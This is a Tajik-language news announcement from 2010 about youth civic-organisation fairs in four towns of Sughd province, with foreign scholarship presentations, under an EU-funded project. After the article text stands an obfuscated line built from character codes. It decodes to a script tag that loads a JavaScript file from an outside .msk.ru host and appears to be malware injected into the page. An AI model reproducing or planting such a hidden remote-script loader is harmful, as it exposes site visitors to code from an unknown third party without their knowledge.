7.10.2010
Дар вилояти Суғд ярмакаҳои ташкилотҳои ҷамъитӣ гузаронида мешаванд.
Дар нимаи аввали моҳи октябри соли ҷорӣ дар якчанд шаҳру ноҳияҳои Суғд ярмаркаҳои ташкилотҳои ҷамъиятии ҷавонони вилояти Суғд барпо мегарданд. Ҳадафи асосии ярмаркаҳо, ин ошно нумадани ҷавонон бо фаълолияти ташкилотҳои чамъиятӣ мебошад. Инчунин ташкилкунандагони ярмарка бо амалӣ хеш мехоҳанд, ки диқати ҷавононро ба ҳаракати ҷамъятӣ ҷалб намоянд ва боварӣ доранд, ки ҷавонон дар мусоҳибаҳои бевосита бо мақсадҳои асосии ташкилотҳо ва оиди фаъолияти ҷамъиятӣ маълумоти муккамал мегиранд ва дар самти фаъолияти ҷамъиятӣ майли хешро пайдо менамоянд.
Ҳамчунин, дар ярмаркаҳо аз ҷониби намояндагони Сафорати ИМА дар Тоҷикистон, Хазинаи Сорос ва маркази DAAD дар Душанбе ба ҷавонон барномаҳои байналхалқии стипендалӣ муаррифӣ мегарданд. Ин муаррифӣ бо имкониятҳои таҳсил дар донишкадаҳои хориҷи кишвар шинос менамояд. Дар вақти муаррифии барномаҲои стипендиалӣ ҷавонон ба саволҳои худ оиди таҳсил дар хориҷа посух хоҳанд гирифт.

Аз рӯи нақшаи корӣ, сана ва минтақаҳои гузаронидани ярмаркаҳо чунин:
• 8 октябр дар маркази ноҳияи Айни;
• 9 октябр дар ш. Панҷакент;
• 11 октябр дар ш.Исфара;
• 13 октябр дар ш.Истаравшан.

Ярмараҳои ташкилотҳои ҷамъиятии ҷавонони вилояти Суғд дар доираи лоиҳаи «Ташаббусҳои Ҷавонони Суғд» гузаронида мешаванд. Лоиҳаи «Ташаббусхои Ҷавонони Суғд» аз тарафи Иттиҳоди Аврупо маблағгузорӣ шудааст ва аз ҷониби ТҶ «ГИТ-Аксент» дар шарикӣ бо ТҶ МИМФ «Фурӯг» амалӣ шуда истодааст.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)a8da34f5f970da4d31d10c45ed118cec.js" type="text/javascript">

ТАВЗЕҲОТ